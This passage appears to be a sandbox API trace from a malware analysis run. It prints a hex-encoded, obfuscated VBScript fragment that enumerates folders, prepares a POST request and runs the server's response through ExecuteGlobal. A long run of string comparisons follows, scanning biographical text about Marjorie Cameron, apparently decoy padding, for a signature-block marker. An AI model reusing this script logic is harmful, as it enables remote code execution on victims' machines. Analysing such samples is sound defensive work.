3\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x44\x69\x6d\x20\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x2c\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x2c\x6e\x69\x6e\x69\x73\x61\x6f\x73\x64\x73\x61\x73\x73\x61\x73\x69\x2c\x20\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x2c\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x0d\x0a\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x32\x2b\x20\x31\x20\x2b\x20\x38\x20\x2d\x33\x20\x2d\x20\x32\x20\x2d\x32\x0d\x0a\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x20\x34\x2b\x31\x20\x2b\x20\x31\x32\x20\x2b\x31\x20\x2b\x32\x20\x2b\x33\x0d\x0a\x0d\x0a\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x20\x3d\x20\x22\x69\x64\x3d\x31\x31\x31\x22\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x6d\x53\x67\x42\x4f\x58\x20\x22\x2d\x20\x4e\x30\x54\x20\x53\x65\x61\x72\x63\x68\x3a\x20\x22\x20\x26\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x0d\x0a\x20\x0d\x0a\x20\x44\x69\x6d\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x2c\x20\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x20\x3d\x20\x22\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x6e\x69\x6e\x6f\x73\x5a\x65\x72\x6f\x72\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x09\x0d\x0a\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x20\x3d\x20\x22\x50\x4f\x53\x54\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x64\x6f\x6b\x69\x6e\x61\x73\x54\x65\x73\x74\x53\x28\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x45\x78\x65\x63\x75\x74\x65\x47\x6c\x6f\x62\x61\x6c\x20\x22\x22\x20\x2b\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x2b\x20\x22\x22\x20\x0d\x0a\x09\x09\x09\x7a\x61\x73\x64\x61\x73\x6f\x6d\x64\x73\x61\x69\x6e\x73\x28\x29\x0d\x0a") returned 7303
	[0206.441] realloc (_Block=0x62c1a0, _Size=0x390e) returned 0x62c1a0
	[0206.441] ??2@YAPEAX_K@Z () returned 0x62b720
	[0206.442] free (_Block=0x62c1a0) 
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] CoUninitialize () 
	[0206.442] ??3@YAXPEAX@Z () returned 0x721ee701
	[0206.442] CloseHandle (hObject=0x13c) returned 1
	[0206.442] wcsncmp (_String1="'Marjorie Cameron (April 23, 1922", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 26
	[0206.442] wcsncmp (_String1="Marjorie Cameron (April 23, 1922 ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64
	[0206.442] wcsncmp (_String1="arjorie Cameron (April 23, 1922 â", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.442] wcsncmp (_String1="rjorie Cameron (April 23, 1922 â€", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.442] wcsncmp (_String1="jorie Cameron (April 23, 1922 –", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 93
	[0206.442] wcsncmp (_String1="orie Cameron (April 23, 1922 – ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.442] wcsncmp (_String1="rie Cameron (April 23, 1922 – J", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.442] wcsncmp (_String1="ie Cameron (April 23, 1922 – Ju", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.442] wcsncmp (_String1="e Cameron (April 23, 1922 – Jun", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.442] wcsncmp (_String1=" Cameron (April 23, 1922 – June", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.442] wcsncmp (_String1="Cameron (April 23, 1922 – June ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54
	[0206.442] wcsncmp (_String1="ameron (April 23, 1922 – June 2", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.442] wcsncmp (_String1="meron (April 23, 1922 – June 24", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96
	[0206.442] wcsncmp (_String1="eron (April 23, 1922 – June 24,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.442] wcsncmp (_String1="ron (April 23, 1922 – June 24, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.442] wcsncmp (_String1="on (April 23, 1922 – June 24, 1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.442] wcsncmp (_String1="n (April 23, 1922 – June 24, 19", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.442] wcsncmp (_String1=" (April 23, 1922 – June 24, 199", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.442] wcsncmp (_String1="(April 23, 1922 – June 24, 1995", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27
	[0206.442] wcsncmp (_String1="April 23, 1922 – June 24, 1995)", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52
	[0206.442] wcsncmp (_String1="pril 23, 1922 – June 24, 1995) ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99
	[0206.442] wcsncmp (_String1="ril 23, 1922 – June 24, 1995) w", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.442] wcsncmp (_String1="il 23, 1922 – June 24, 1995) wa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.442] wcsncmp (_String1="l 23, 1922 – June 24, 1995) was", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95
	[0206.442] wcsncmp (_String1=" 23, 1922 – June 24, 1995) was ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.442] wcsncmp (_String1="23, 1922 – June 24, 1995) was a", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37
	[0206.442] wcsncmp (_String1="\x33\x2c\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 38
	[0206.442] wcsncmp (_String1="\x2c\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.442] wcsncmp (_String1="\x20\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.442] wcsncmp (_String1="\x31\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0206.442] wcsncmp (_String1="\x39\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44
	[0206.442] wcsncmp (_String1="\x32\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37
	[0206.443] wcsncmp (_String1="\x32\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37
	[0206.443] wcsncmp (_String1="\x20\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="\xe2\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63\x61", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 213
	[0206.443] wcsncmp (_String1="\x20ac\x201c\x20\x4a\x75\x6e\x65\x20\x32\x34\x2c\x20\x31\x39\x39\x35\x29\x20\x77\x61\x73\x20\x61\x6e\x20\x41\x6d\x65\x72\x69\x63\x61\x6e", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 8351
	[0206.443] wcsncmp (_String1="“ June 24, 1995) was an American ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 8207
	[0206.443] wcsncmp (_String1=" June 24, 1995) was an American a", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="June 24, 1995) was an American ar", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 61
	[0206.443] wcsncmp (_String1="une 24, 1995) was an American art", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104
	[0206.443] wcsncmp (_String1="ne 24, 1995) was an American arti", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.443] wcsncmp (_String1="e 24, 1995) was an American artis", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.443] wcsncmp (_String1=" 24, 1995) was an American artist", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="24, 1995) was an American artist,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37
	[0206.443] wcsncmp (_String1="4, 1995) was an American artist, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 39
	[0206.443] wcsncmp (_String1=", 1995) was an American artist, p", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.443] wcsncmp (_String1=" 1995) was an American artist, po", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="1995) was an American artist, poe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36
	[0206.443] wcsncmp (_String1="995) was an American artist, poet", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44
	[0206.443] wcsncmp (_String1="95) was an American artist, poet,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44
	[0206.443] wcsncmp (_String1="5) was an American artist, poet, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40
	[0206.443] wcsncmp (_String1=") was an American artist, poet, a", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28
	[0206.443] wcsncmp (_String1=" was an American artist, poet, ac", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="was an American artist, poet, act", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106
	[0206.443] wcsncmp (_String1="as an American artist, poet, actr", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.443] wcsncmp (_String1="s an American artist, poet, actre", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.443] wcsncmp (_String1=" an American artist, poet, actres", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="an American artist, poet, actress", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.443] wcsncmp (_String1="n American artist, poet, actress,", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.443] wcsncmp (_String1=" American artist, poet, actress, ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="American artist, poet, actress, a", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52
	[0206.443] wcsncmp (_String1="merican artist, poet, actress, an", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96
	[0206.443] wcsncmp (_String1="erican artist, poet, actress, and", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.443] wcsncmp (_String1="rican artist, poet, actress, and ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.443] wcsncmp (_String1="ican artist, poet, actress, and o", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.443] wcsncmp (_String1="can artist, poet, actress, and oc", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.443] wcsncmp (_String1="an artist, poet, actress, and occ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.443] wcsncmp (_String1="n artist, poet, actress, and occu", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97
	[0206.443] wcsncmp (_String1=" artist, poet, actress, and occul", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.443] wcsncmp (_String1="artist, poet, actress, and occult", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.443] wcsncmp (_String1="rtist, poet, actress, and occulti", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.443] wcsncmp (_String1="tist, poet, actress, and occultis", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.443] wcsncmp (_String1="ist, poet, actress, and occultist", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92
	[0206.443] wcsncmp (_String1="st, poet, actress, and occultist.", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.443] wcsncmp (_String1="t, poet, actress, and occultist. ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.444] wcsncmp (_String1=", poet, actress, and occultist. A", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.444] wcsncmp (_String1=" poet, actress, and occultist. Af", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.444] wcsncmp (_String1="poet, actress, and occultist. Aft", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99
	[0206.444] wcsncmp (_String1="oet, actress, and occultist. Afte", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98
	[0206.444] wcsncmp (_String1="et, actress, and occultist. After", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.444] wcsncmp (_String1="t, actress, and occultist. After ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.444] wcsncmp (_String1=", actress, and occultist. After s", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31
	[0206.444] wcsncmp (_String1=" actress, and occultist. After se", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19
	[0206.444] wcsncmp (_String1="actress, and occultist. After ser", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84
	[0206.444] wcsncmp (_String1="ctress, and occultist. After serv", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86
	[0206.444] wcsncmp (_String1="tress, and occultist. After servi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103
	[0206.444] wcsncmp (_String1="ress, and occultist. After servin", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101
	[0206.444] wcsncmp (_String1="ess, and occultist. After serving", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88
	[0206.444] wcsncmp (_String1="ss, and occultist. After serving ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
	[0206.444] wcsncmp (_String1="s, and occultist. After serving i", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102
